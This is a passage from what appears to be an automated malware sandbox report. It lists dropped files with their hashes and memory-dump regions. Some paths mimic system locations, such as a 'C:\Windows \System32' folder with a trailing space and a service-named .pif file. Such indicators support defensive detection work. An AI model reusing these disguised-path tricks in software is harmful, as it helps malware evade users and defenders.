| SHA512 | 101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9 |
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\sppsvc.rtf
| MD5 | 8ab8b1cab45b50b97ff80bff5e10291a |
| SHA1 | 966cd90ae89517d31fecc7bfaccec8703ddecfdb |
| SHA256 | 9b6ed53256341d48bc5981e48c8bb1e7547928143af4b33f0433468c7a4e11fd |
| SHA512 | 02adb968d9a6153fd055cff48aaa7c2328d41a5a14b88b7509955903a12e5c7a07ade608a7ffb54d9bfebe243a7f01d5c9655dcd3276110f32e5ee0b2c322cdf |
C:\Windows \System32\per.exe
| MD5 | 85018be1fd913656bc9ff541f017eacd |
| SHA1 | 26d7407931b713e0f0fa8b872feecdb3cf49065a |
| SHA256 | c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5 |
| SHA512 | 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459 |
C:\Users\Public\Libraries\sppsvc.pif
| MD5 | e62ff91b6b729d830b15d8f81bc57ede |
| SHA1 | 38b3ac66c5899d0de5a91f66ecee1cb6e95b2973 |
| SHA256 | 33a072ab2cc4195ed145081a2c88f2b000bdcae9c4b5989c7e9013feabb6ec59 |
| SHA512 | 9ef30e503f09061a72560a384dd25c5028db46154cce430c1db7149cc697c795f86effd691167d61606402927087d0dc34366487ae7714b650bd42919e558d1f |
C:\Windows \System32\itsme.exe
| MD5 | 5e3561d98bd5fb1d20098faa0384faa8 |
| SHA1 | c07ccaa16c161776c35e3d056afcc2a6b0816616 |
| SHA256 | 2f59cfe63442b61f8aaef0e1471d40dbc8ae91d4697bde7699e9d0f3f1aece1a |
| SHA512 | d8cde2587b92dfa15def287bb0043d142a9329aae8670963f179e6118d3bb1e758cbb9fdcd8f43065edaf15edbd9e25c2068d854df5e5ca5c4c6bc883fd4904e |
memory/2020-87-0x0000000000400000-0x0000000000522000-memory.dmp
memory/4356-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-88-0x0000000002A50000-0x0000000003A50000-memory.dmp
memory/4356-95-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-104-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4356-108-0x0000000000400000-0x0000000000482000-memory.dmp